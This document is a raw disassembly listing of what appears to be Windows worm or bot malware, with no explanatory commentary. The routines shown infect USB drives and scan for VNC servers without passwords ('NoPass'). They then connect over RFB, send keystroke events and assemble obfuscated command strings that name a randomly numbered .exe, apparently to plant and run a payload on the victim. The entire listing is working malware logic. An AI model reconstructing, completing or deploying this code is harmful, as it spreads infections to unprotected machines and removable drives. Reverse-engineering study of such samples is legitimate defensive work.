sub_407E4B proc near ; DATA XREF: sub_40A9FE+6731�o
var_27D8 = byte ptr -27D8h
var_27D7 = byte ptr -27D7h
var_C8 = dword ptr -0C8h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 27D8h
call sub_429B60
mov eax, [ebp+arg_0]
push esi
push edi
and [ebp+var_27D8], 0
push 31h
mov esi, eax
pop ecx
lea edi, [ebp+var_C8]
rep movsd
mov dword ptr [eax+0BCh], 1
mov ecx, 9C3h
xor eax, eax
lea edi, [ebp+var_27D7]
rep stosd
stosw
and byte ptr [ebp+arg_0+2], 0
mov byte ptr [ebp+arg_0], 20h
stosb
lea eax, [ebp+var_27D8]
mov byte ptr [ebp+arg_0+1], 3Ah
push eax
push 270Fh
call dword_437098 ; GetLogicalDriveStringsA
test eax, eax
jz loc_407F4C
lea ecx, [ebp+var_27D8]
push ebx
mov [ebp+var_4], ecx
mov ebx, offset aXlpyr1anpgm0 ; "xLpyR1aNPGm0"
mov edi, offset aSInfectedUsbDr ; "%s Infected USB drive: %s"
mov esi, offset dword_443F1C
loc_407ECC: ; CODE XREF: sub_407E4B+FE�j
mov al, [ecx]
cmp al, 41h
mov byte ptr [ebp+arg_0], al
jz short loc_407F3D
cmp al, 42h
jz short loc_407F3D
cmp al, 61h
jz short loc_407F3D
cmp al, 62h
jz short loc_407F3D
lea eax, [ebp+arg_0]
push eax
call dword_437094 ; GetDriveTypeA
cmp eax, 2
jnz short loc_407F3A
lea eax, [ebp+arg_0]
push eax
call sub_4079AA
test eax, eax
pop ecx
jz short loc_407F3A
cmp [ebp+var_18], 0
jz short loc_407F1F
cmp [ebp+var_10], 0
jnz short loc_407F25
lea eax, [ebp+arg_0]
push eax
push ebx
push edi
push esi
push [ebp+var_C8]
call sub_41CE4A
add esp, 14h
loc_407F1F: ; CODE XREF: sub_407E4B+B7�j
cmp [ebp+var_10], 0
jz short loc_407F3A
loc_407F25: ; CODE XREF: sub_407E4B+BD�j
lea eax, [ebp+arg_0]
push eax
push ebx
push edi
push esi
push [ebp+var_C8]
call sub_41CDD4
add esp, 14h
loc_407F3A: ; CODE XREF: sub_407E4B+A3�j
; sub_407E4B+B1�j ...
mov ecx, [ebp+var_4]
loc_407F3D: ; CODE XREF: sub_407E4B+88�j
; sub_407E4B+8C�j ...
mov al, [ecx]
inc ecx
test al, al
jnz short loc_407F3D
cmp [ecx], al
mov [ebp+var_4], ecx
jnz short loc_407ECC
pop ebx
loc_407F4C: ; CODE XREF: sub_407E4B+62�j
xor eax, eax
pop edi
inc eax
pop esi
leave
retn 4
sub_407E4B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F55 proc near ; CODE XREF: sub_408B99+604�p
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
mov edi, [ebp+arg_4]
lea eax, [ebp+var_8]
xor esi, esi
sub edi, eax
loc_407F66: ; CODE XREF: sub_407F55+32�j
push [ebp+arg_4]
call sub_4293A0
cmp esi, eax
pop ecx
jnb short loc_407F7E
lea eax, [ebp+esi+var_8]
mov cl, [edi+eax]
mov [eax], cl
jmp short loc_407F83
; ---------------------------------------------------------------------------
loc_407F7E: ; CODE XREF: sub_407F55+1C�j
and [ebp+esi+var_8], 0
loc_407F83: ; CODE XREF: sub_407F55+27�j
inc esi
cmp esi, 8
jb short loc_407F66
lea eax, [ebp+var_8]
push 0
push eax
call sub_4034A5
mov esi, [ebp+arg_0]
pop ecx
pop ecx
push 2
pop edi
loc_407F9C: ; CODE XREF: sub_407F55+54�j
push esi
push esi
call sub_40366B
pop ecx
add esi, 8
dec edi
pop ecx
jnz short loc_407F9C
pop edi
pop esi
leave
retn
sub_407F55 endp
; =============== S U B R O U T I N E =======================================
sub_407FAF proc near ; CODE XREF: .text:00408398�p
; .text:0040841A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_8]
xor esi, esi
jmp short loc_407FDA
; ---------------------------------------------------------------------------
loc_407FB9: ; CODE XREF: sub_407FAF+2D�j
mov eax, [esp+8+arg_4]
push 0
add eax, esi
push edi
push eax
push [esp+14h+arg_0]
call dword_456F58 ; recv
test eax, eax
jz short loc_407FE4
cmp eax, 0FFFFFFFFh
jz short loc_407FE4
sub edi, eax
add esi, eax
loc_407FDA: ; CODE XREF: sub_407FAF+8�j
test edi, edi
jg short loc_407FB9
xor eax, eax
inc eax
loc_407FE1: ; CODE XREF: sub_407FAF+37�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_407FE4: ; CODE XREF: sub_407FAF+20�j
; sub_407FAF+25�j
xor eax, eax
jmp short loc_407FE1
sub_407FAF endp
; =============== S U B R O U T I N E =======================================
sub_407FE8 proc near ; CODE XREF: .text:004083FF�p
; .text:00408470�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_408025
xor esi, esi
test edi, edi
jle short loc_40801F
loc_407FF8: ; CODE XREF: sub_407FE8+35�j
mov eax, edi
push 0
sub eax, esi
push eax
mov eax, [esp+10h+arg_4]
add eax, esi
push eax
push [esp+14h+arg_0]
call dword_456F8C ; send
cmp eax, 0FFFFFFFFh
jz short loc_408025
test eax, eax
jz short loc_408025
add esi, eax
cmp esi, edi
jl short loc_407FF8
loc_40801F: ; CODE XREF: sub_407FE8+E�j
xor eax, eax
inc eax
loc_408022: ; CODE XREF: sub_407FE8+3F�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_408025: ; CODE XREF: sub_407FE8+8�j
; sub_407FE8+2B�j ...
xor eax, eax
jmp short loc_408022
sub_407FE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408029 proc near ; CODE XREF: .text:004085BE�p
; .text:004085D4�p ...
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push esi
push edi
mov esi, offset dword_4553A4
lea edi, [ebp+var_10]
mov ax, word_43EE74
movsd
movsb
mov esi, offset dword_4557C8
lea edi, [ebp+var_18]
mov [ebp+var_2], ax
mov ax, word_43EE70
movsd
mov [ebp+var_6], ax
mov ax, word_454038
movsw
mov [ebp+var_4], ax
mov eax, [ebp+arg_8]
xor esi, esi
cmp eax, esi
jnz loc_4080F2
mov edi, [ebp+arg_0]
push ebx
mov ebx, [ebp+arg_4]
mov [ebp+arg_8], esi
loc_40807B: ; CODE XREF: sub_408029+C4�j
mov eax, [ebp+arg_8]
sub eax, esi
jz short loc_408098
dec eax
jnz short loc_4080E6
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_456F8C ; send
lea eax, [ebp+var_4]
jmp short loc_4080A9
; ---------------------------------------------------------------------------
loc_408098: ; CODE XREF: sub_408029+57�j
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_456F8C ; send
lea eax, [ebp+var_6]
loc_4080A9: ; CODE XREF: sub_408029+6D�j
push esi
push 1
push eax
push edi
call dword_456F8C ; send
push ebx
call sub_4293A0
pop ecx
cmp eax, 2
push esi
jnz short loc_4080C8
push 4
lea eax, [ebp+var_10]
jmp short loc_4080CD
; ---------------------------------------------------------------------------
loc_4080C8: ; CODE XREF: sub_408029+96�j
push 5
lea eax, [ebp+var_18]
loc_4080CD: ; CODE XREF: sub_408029+9D�j
push eax
push edi
call dword_456F8C ; send
push esi
push ebx
call sub_4293A0
pop ecx
push eax
push ebx
push edi
call dword_456F8C ; send
loc_4080E6: ; CODE XREF: sub_408029+5A�j
inc [ebp+arg_8]
cmp [ebp+arg_8], 1
jle short loc_40807B
pop ebx
jmp short loc_408165
; ---------------------------------------------------------------------------
loc_4080F2: ; CODE XREF: sub_408029+42�j
dec eax
jz short loc_40810E
dec eax
jnz short loc_408165
mov edi, [ebp+arg_0]
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_456F8C ; send
lea eax, [ebp+var_4]
jmp short loc_408122
; ---------------------------------------------------------------------------
loc_40810E: ; CODE XREF: sub_408029+CA�j
mov edi, [ebp+arg_0]
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_456F8C ; send
lea eax, [ebp+var_6]
loc_408122: ; CODE XREF: sub_408029+E3�j
push esi
push 1
push eax
push edi
call dword_456F8C ; send
push [ebp+arg_4]
call sub_4293A0
pop ecx
cmp eax, 2
push esi
jnz short loc_408143
push 4
lea eax, [ebp+var_10]
jmp short loc_408148
; ---------------------------------------------------------------------------
loc_408143: ; CODE XREF: sub_408029+111�j
push 5
lea eax, [ebp+var_18]
loc_408148: ; CODE XREF: sub_408029+118�j
push eax
push edi
call dword_456F8C ; send
push esi
push [ebp+arg_4]
call sub_4293A0
pop ecx
push eax
push [ebp+arg_4]
push edi
call dword_456F8C ; send
loc_408165: ; CODE XREF: sub_408029+C7�j
; sub_408029+CD�j
pop edi
pop esi
leave
retn
sub_408029 endp
; ---------------------------------------------------------------------------
mov eax, 29ECh
call sub_429B60
push ebx
push ebp
push esi
push edi
mov esi, offset dword_43EF88
lea edi, [esp+7Ch]
movsd
movsd
movsd
movsb
mov esi, offset dword_43EF84
lea edi, [esp+60h]
movsw
movsb
mov esi, offset dword_4553A4
lea edi, [esp+64h]
movsd
movsb
mov esi, offset dword_43EF80
lea edi, [esp+20h]
movsw
movsb
mov esi, offset dword_43EF7C
lea edi, [esp+38h]
movsw
mov ax, word_43EE70
movsb
mov esi, offset loc_43EF78
lea edi, [esp+1Ch]
movsw
movsb
mov [esp+2Ah], ax
mov [esp+3Eh], ax
mov ax, word_43EF74
xor esi, esi
mov [esp+26h], ax
mov ax, word_43EF70
push esi
push 1
push 2
mov [esp+34h], ax
mov [esp+3Ch], esi
call dword_456FD0 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [esp+14h], edi
jnz short loc_408208
push eax
call dword_456FF0 ; closesocket
loc_408208: ; CODE XREF: .text:004081FF�j
lea eax, [esp+2A08h]
mov word ptr [esp+9Ch], 2
push eax
call dword_456F7C ; inet_addr
push 170Ch
mov [esp+0A4h], eax
call dword_456F38 ; ntohs
mov [esp+9Eh], ax
lea eax, [esp+9Ch]
push 10h
push eax
push edi
call dword_456EBC ; connect
test eax, eax
jnz loc_408B82
mov edi, dword_437190
mov ebp, 3E8h
mov ebx, offset byte_4556C8
mov esi, offset aVxppy0owq7d ; "VxPpy0owQ7D/"
loc_408268: ; CODE XREF: .text:00408318�j
; .text:0040845F�j ...
push 40h
lea eax, [esp+0B0h]
push 0
push eax
call sub_429760
add esp, 0Ch
lea eax, [esp+0ACh]
push 0
push 40h
push eax
push dword ptr [esp+20h]
call dword_456F58 ; recv
test eax, eax
jle loc_4088C4
cmp eax, 0FFFFFFFFh
jz loc_4088C4
mov eax, [esp+30h]
sub eax, 0
jz loc_408874
dec eax
jz short loc_4082DC
dec eax
jnz loc_4088B9
lea eax, [esp+64h]
push eax
lea eax, [esp+0B0h]
push eax
call dword_437178 ; lstrcmpiA
test eax, eax
jz loc_4088C4
loc_4082D5: ; CODE XREF: .text:00408889�j
xor esi, esi
jmp loc_408B82
; ---------------------------------------------------------------------------
loc_4082DC: ; CODE XREF: .text:004082B1�j
lea eax, [esp+60h]
push eax
lea eax, [esp+0B0h]
push eax
call dword_437178 ; lstrcmpiA
test eax, eax
push 0
jnz short loc_40831D
lea eax, [esp+2Eh]
push eax
call sub_4293A0
pop ecx
push eax
lea eax, [esp+32h]
push eax
push dword ptr [esp+20h]
call dword_456F8C ; send
mov dword ptr [esp+30h], 2
jmp loc_408268
; ---------------------------------------------------------------------------
loc_40831D: ; CODE XREF: .text:004082F3�j
push 1
push 2
call dword_456FD0 ; socket
cmp eax, 0FFFFFFFFh
jz loc_408A35
lea eax, [esp+2A08h]
push eax
call dword_456F7C ; inet_addr
push dword ptr [esp+2AACh]
mov [esp+94h], eax
mov word ptr [esp+90h], 2
call dword_456F38 ; ntohs
push 6
push 1
push 2
mov [esp+9Ah], ax
call dword_4372BC ; socket
lea ecx, [esp+8Ch]
push 10h
push ecx
push eax
mov [esp+1Ch], eax
call dword_456EBC ; connect
test eax, eax
jnz loc_408A35
lea eax, [esp+6Ch]
push 0Ch
push eax
push dword ptr [esp+18h]
call sub_407FAF
add esp, 0Ch
test eax, eax
jz loc_408A2B
lea eax, [esp+2Ch]
and byte ptr [esp+78h], 0
push eax
lea eax, [esp+38h]
push eax
lea eax, [esp+74h]
push offset aRfb03d_03d ; "RFB %03d.%03d\n"
push eax
call sub_429E0E
add esp, 10h
push 3
pop eax
cmp [esp+34h], eax
jl loc_408A2B
jnz short loc_4083E2
cmp [esp+2Ch], eax
jl loc_408A2B
loc_4083E2: ; CODE XREF: .text:004083D6�j
push 5
push eax
lea eax, [esp+74h]
push offset aRfb03d_03d ; "RFB %03d.%03d\n"
push eax
call sub_429B03
lea eax, [esp+7Ch]
push 0Ch
push eax
push dword ptr [esp+28h]
call sub_407FE8
add esp, 1Ch
test eax, eax
jz loc_408A2B
lea eax, [esp+44h]
push 4
push eax
push dword ptr [esp+18h]
call sub_407FAF
add esp, 0Ch
test eax, eax
jz loc_408A2B
mov ecx, [esp+44h]
mov eax, ecx
mov edx, ecx
and eax, 0FF0000h
shr edx, 10h
or eax, edx
mov edx, ecx
shl edx, 10h
and ecx, 0FF00h
or edx, ecx
shr eax, 8
shl edx, 8
or eax, edx
mov [esp+44h], eax
sub eax, 0
jz loc_408A35
dec eax
jnz loc_408268
push 1
push offset word_454038
push dword ptr [esp+18h]
call sub_407FE8
add esp, 0Ch
test eax, eax
jz loc_408268
lea eax, [esp+48h]
push 18h
push eax
push dword ptr [esp+18h]
call sub_407FAF
add esp, 0Ch
test eax, eax
jz loc_408268
mov eax, [esp+48h]
xor edx, edx
mov dl, [esp+49h]
mov ecx, 0FFh
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+4Ah]
mov [esp+48h], dx
xor edx, edx
mov dl, [esp+4Bh]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+50h]
mov [esp+4Ah], dx
xor edx, edx
mov dl, [esp+51h]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+52h]
mov [esp+50h], dx
xor edx, edx
mov dl, [esp+53h]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+54h]
mov [esp+52h], dx
xor edx, edx
mov dl, [esp+55h]
shl eax, 8
xor dl, al
and dx, cx
xor edx, eax
mov eax, [esp+5Ch]
mov [esp+54h], dx
mov ecx, eax
mov edx, eax
and ecx, 0FF0000h
shr edx, 10h
or ecx, edx
mov edx, eax
shl edx, 10h
and eax, 0FF00h
or edx, eax
lea eax, [esp+2A08h]
push eax
lea eax, [esp+2F0h]
push dword ptr [esp+30h]
shr ecx, 8
push dword ptr [esp+3Ch]
shl edx, 8
push offset aVncD_DSNopass ; "VNC%d.%d: %s - (NoPass)"
or ecx, edx
push 2710h
push eax
mov [esp+74h], ecx
call sub_429BBE
add esp, 18h
cmp dword ptr [esp+2AC4h], 0
jz short loc_40859F
lea eax, [esp+2ECh]
push eax
push offset aS_5 ; "%s"
push dword ptr [esp+2A08h]
push dword ptr [esp+2A10h]
call sub_41CE4A
add esp, 10h
loc_40859F: ; CODE XREF: .text:0040857A�j
push 2710h
lea eax, [esp+2F0h]
push 0
push eax
call sub_429760
lea eax, [esp+2Ch]
push 1
push eax
push dword ptr [esp+24h]
call sub_408029
add esp, 18h
push ebp
call edi ; dword_437190
lea eax, [esp+28h]
push 0
push eax
push dword ptr [esp+18h]
call sub_408029
add esp, 0Ch
push ebp
call edi ; dword_437190
lea eax, [esp+20h]
push 2
push eax
push dword ptr [esp+18h]
call sub_408029
add esp, 0Ch
push ebp
call edi ; dword_437190
call sub_429B9C
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 9
cdq
pop ecx
idiv ecx
lea eax, [esp+1FCh]
push edx
push offset dword_4439B4
push offset aSDDDDD_exe ; "%s%d%d%d%d%d.exe"
push eax
call sub_429B03
push 100h
push 0
push ebx
call sub_429760
add esp, 2Ch
cmp dword_456DA8, 0
jnz loc_408713
lea eax, [esp+2A08h]
push eax
call sub_41E4C1
test eax, eax
pop ecx
mov dword ptr [esp+18h], offset dword_457CF8
jnz short loc_408687
mov dword ptr [esp+18h], offset dword_457C40
loc_408687: ; CODE XREF: .text:0040867D�j
lea eax, [esp+1ECh]
push offset a2Afm0dt3o6_ ; "2/Afm0dt3o6."
push eax
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
lea eax, [esp+210h]
push eax
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
call sub_401A77
push eax
call sub_401A77
push eax
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
push dword_454A30
push dword ptr [esp+64h]
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset a7zfry0iusme1 ; "7Zfry0IUSmE1"
push offset aSSSSDSSSSSSSSS ; "%s %s %s %s %d >> %s %s %s %s %s >> %s "...
push 100h
push ebx
call sub_429BBE
add esp, 68h
jmp loc_40879F
; ---------------------------------------------------------------------------
loc_408713: ; CODE XREF: .text:0040865F�j
push offset a2Afm0dt3o6_ ; "2/Afm0dt3o6."
push offset dword_456BA8
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
push offset dword_456BA8
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
push offset aEih0f1gakfp0 ; "EiH0f1GakFP0"
push esi
call sub_401AF0
push eax
push offset dword_4569A8
push offset dword_4567A8
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
push dword_4567A0
push offset dword_4565A0
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset a7zfry0iusme1 ; "7Zfry0IUSmE1"
push offset aSSSSDSSSSSSS_0 ; "%s %s %s %s %d >> %s %s %s %s %s >> %s "...
push 100h
push ebx
call sub_429BBE
add esp, 74h
loc_40879F: ; CODE XREF: .text:0040870E�j
and dword ptr [esp+18h], 0
push ebx
call sub_4293A0
test eax, eax
pop ecx
jbe short loc_4087F4
loc_4087AF: ; CODE XREF: .text:004087F2�j
mov eax, [esp+18h]
movsx eax, byte_4556C8[eax]
push eax
push offset dword_43EE88
lea eax, [esp+48h]
push 3
push eax
call sub_429BBE
lea eax, [esp+50h]
push 0
push eax
push dword ptr [esp+28h]
call sub_408029
add esp, 1Ch
push 0Fh
call edi ; dword_437190
inc dword ptr [esp+18h]
push ebx
call sub_4293A0
cmp [esp+1Ch], eax
pop ecx
jb short loc_4087AF
loc_4087F4: ; CODE XREF: .text:004087AD�j
push ebp
call edi ; dword_437190
lea eax, [esp+38h]
push 0
push eax
push dword ptr [esp+18h]
call sub_408029
add esp, 0Ch
push 7530h
call edi ; dword_437190
lea eax, [esp+1Ch]
push 1
push eax
push dword ptr [esp+18h]
call sub_408029
add esp, 0Ch
push ebp
call edi ; dword_437190
lea eax, [esp+26h]
push 0
push eax
push dword ptr [esp+18h]
call sub_408029
add esp, 0Ch
push ebp
call edi ; dword_437190
lea eax, [esp+1Ch]
push 2
push eax
push dword ptr [esp+18h]
call sub_408029
add esp, 0Ch
push ebp
call edi ; dword_437190
mov eax, [esp+2AB4h]
mov dword_4556C0, 1
shl eax, 6
lea eax, dword_43A380[eax]
inc dword ptr [eax]
jmp loc_408268
; ---------------------------------------------------------------------------
loc_408874: ; CODE XREF: .text:004082AA�j
lea eax, [esp+7Ch]
push eax
lea eax, [esp+0B0h]
push eax
call dword_437178 ; lstrcmpiA
test eax, eax
jnz loc_4082D5
push eax
lea eax, [esp+80h]
push eax
call sub_4293A0
pop ecx
push eax
lea eax, [esp+84h]
push eax
push dword ptr [esp+20h]
call dword_456F8C ; send
mov dword ptr [esp+30h], 1
loc_4088B9: ; CODE XREF: .text:004082B4�j
cmp dword ptr [esp+30h], 3
jnz loc_408268
loc_4088C4: ; CODE XREF: .text:00408294�j
; .text:0040829D�j ...
push 0
lea eax, [esp+42h]
push 1
push eax
push dword ptr [esp+20h]
call dword_456F8C ; send
lea eax, [esp+20h]
push 1
push eax
push dword ptr [esp+1Ch]
call sub_408029
add esp, 0Ch
push ebp
call edi ; dword_437190
lea eax, [esp+28h]
push 0
push eax
push dword ptr [esp+1Ch]
call sub_408029
add esp, 0Ch
push ebp
call edi ; dword_437190
lea eax, [esp+20h]
push 2
push eax
push dword ptr [esp+1Ch]
call sub_408029
add esp, 0Ch
push ebp
call edi ; dword_437190
call sub_429B9C
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_429B9C
push 9
cdq
pop ecx
idiv ecx
lea eax, [esp+0F8h]
push edx
push offset dword_4439B4
push offset dword_43EE78
push eax
call sub_429B03
push 100h
push 0
push ebx
call sub_429760
add esp, 28h
cmp dword_456DA8, 0
jnz loc_408A3C
lea eax, [esp+2A08h]
push eax
call sub_41E4C1
test eax, eax
pop ecx
mov dword ptr [esp+2Ch], offset dword_457CF8
jnz short loc_40899F
mov dword ptr [esp+2Ch], offset dword_457C40
loc_40899F: ; CODE XREF: .text:00408995�j
lea eax, [esp+0ECh]
push offset a2Afm0dt3o6_ ; "2/Afm0dt3o6."
push eax
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
lea eax, [esp+110h]
push eax
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
call sub_401A77
push eax
call sub_401A77
push eax
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
push dword_454A30
push dword ptr [esp+78h]
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset a7zfry0iusme1 ; "7Zfry0IUSmE1"
push offset aSSSSDSSSSSSSSS ; "%s %s %s %s %d >> %s %s %s %s %s >> %s "...
push 100h
push ebx
call sub_429BBE
add esp, 68h
jmp loc_408AC8
; ---------------------------------------------------------------------------
loc_408A2B: ; CODE XREF: .text:004083A2�j
; .text:004083D0�j ...
push dword ptr [esp+10h]
call dword_4372D8 ; closesocket
loc_408A35: ; CODE XREF: .text:0040832A�j
; .text:00408387�j ...
xor eax, eax
jmp loc_408B8E
; ---------------------------------------------------------------------------
loc_408A3C: ; CODE XREF: .text:00408977�j
push offset a2Afm0dt3o6_ ; "2/Afm0dt3o6."
push offset dword_456BA8
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
push offset dword_456BA8
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
push offset aEih0f1gakfp0 ; "EiH0f1GakFP0"
push esi
call sub_401AF0
push eax
push offset dword_4569A8
push offset dword_4567A8
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
push dword_4567A0
push offset dword_4565A0
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset a7zfry0iusme1 ; "7Zfry0IUSmE1"
push offset aSSSSDSSSSSSS_0 ; "%s %s %s %s %d >> %s %s %s %s %s >> %s "...
push 100h
push ebx
call sub_429BBE
add esp, 74h
loc_408AC8: ; CODE XREF: .text:00408A26�j
push ebx
xor esi, esi
call sub_4293A0
test eax, eax
pop ecx
jbe short loc_408B11
loc_408AD5: ; CODE XREF: .text:00408B0F�j
movsx eax, byte_4556C8[esi]
push eax
push offset dword_43EE88
lea eax, [esp+48h]
push 3
push eax
call sub_429BBE
lea eax, [esp+50h]
push 0
push eax
push dword ptr [esp+2Ch]
call sub_408029
add esp, 1Ch
push 0Ah
call edi ; dword_437190
push ebx
inc esi
call sub_4293A0
cmp esi, eax
pop ecx
jb short loc_408AD5
loc_408B11: ; CODE XREF: .text:00408AD3�j
push ebp
call edi ; dword_437190
mov ebx, [esp+14h]
lea eax, [esp+38h]
push 0
push eax
push ebx
call sub_408029
add esp, 0Ch
push 7530h
call edi ; dword_437190
xor esi, esi
lea eax, [esp+1Ch]
inc esi
push esi
push eax
push ebx
call sub_408029
add esp, 0Ch
push ebp
call edi ; dword_437190
lea eax, [esp+26h]
push 0
push eax
push ebx
call sub_408029
add esp, 0Ch
push ebp
call edi ; dword_437190
lea eax, [esp+1Ch]
push 2
push eax
push ebx
call sub_408029
add esp, 0Ch
push ebp
call edi ; dword_437190
mov eax, [esp+2AB4h]
mov dword_4556C0, esi
shl eax, 6
lea eax, dword_43A380[eax]
inc dword ptr [eax]
loc_408B82: ; CODE XREF: .text:0040824D�j
; .text:004082D7�j
push dword ptr [esp+14h]
call dword_456FF0 ; closesocket
mov eax, esi
loc_408B8E: ; CODE XREF: .text:00408A37�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 29ECh
retn
; =============== S U B R O U T I N E =======================================
sub_408B99 proc near ; CODE XREF: .text:00409680�p
var_74 = byte ptr -74h
var_70 = dword ptr -70h
var_6C = byte ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = byte ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
arg_4 = byte ptr 8
arg_8 = byte ptr 0Ch
arg_C = word ptr 10h
arg_E = word ptr 12h
arg_10 = dword ptr 14h
arg_18 = dword ptr 1Ch
arg_1C = dword ptr 20h
arg_20 = byte ptr 24h
arg_24 = dword ptr 28h
arg_28 = dword ptr 2Ch
arg_2C = byte ptr 30h
arg_38 = byte ptr 3Ch
arg_48 = byte ptr 4Ch
arg_50 = byte ptr 54h
arg_56 = word ptr 5Ah
arg_58 = word ptr 5Ch
arg_5C = dword ptr 60h
arg_12C = byte ptr 130h
arg_15C = byte ptr 160h
arg_283C = byte ptr 2840h
arg_2840 = dword ptr 2844h
arg_2844 = dword ptr 2848h
arg_2848 = byte ptr 284Ch
arg_286C = byte ptr 2870h
arg_2870 = dword ptr 2874h
arg_2874 = dword ptr 2878h
arg_2878 = byte ptr 287Ch
arg_2898 = byte ptr 289Ch
arg_28D0 = dword ptr 28D4h
arg_2900 = dword ptr 2904h
arg_2904 = dword ptr 2908h
arg_290C = dword ptr 2910h
arg_2914 = dword ptr 2918h
arg_2934 = dword ptr 2938h
arg_2938 = dword ptr 293Ch
mov eax, 289Ch
call sub_429B60
push ebx
push ebp
push esi
push edi
mov esi, offset dword_43EF80
lea edi, [esp+10h+arg_8]
movsw
movsb
mov esi, offset dword_43EF7C
lea edi, [esp+10h+arg_1C]
movsw
mov ax, word_43EF70
xor ebx, ebx
movsb
mov esi, offset loc_43EF78
lea edi, [esp+10h+arg_4]
movsw
mov [esp+10h+arg_E], ax
mov ax, word_43EF74
push ebx
push 1
push 2
mov dword_4556C0, ebx
movsb
mov [esp+1Ch+arg_C], ax
call dword_456FD0 ; socket
cmp eax, 0FFFFFFFFh
jz loc_409228
lea eax, [esp+1Ch+arg_2898]
push eax
call dword_456F7C ; inet_addr
push [esp+20h+arg_2938]
mov [esp+24h+arg_5C], eax
mov [esp+24h+arg_58], 2
call dword_456F38 ; ntohs
push 6
push 1
push 2
mov [esp+30h+arg_56], ax
call dword_4372BC ; socket
mov edi, eax
lea eax, [esp+30h+arg_48]
push 10h
push eax
push edi
mov [esp+3Ch+var_20], edi
call dword_456EBC ; connect
test eax, eax
jnz loc_409228
lea eax, [esp+3Ch+arg_2C]
push 0Ch
push eax
push edi
call sub_407FAF
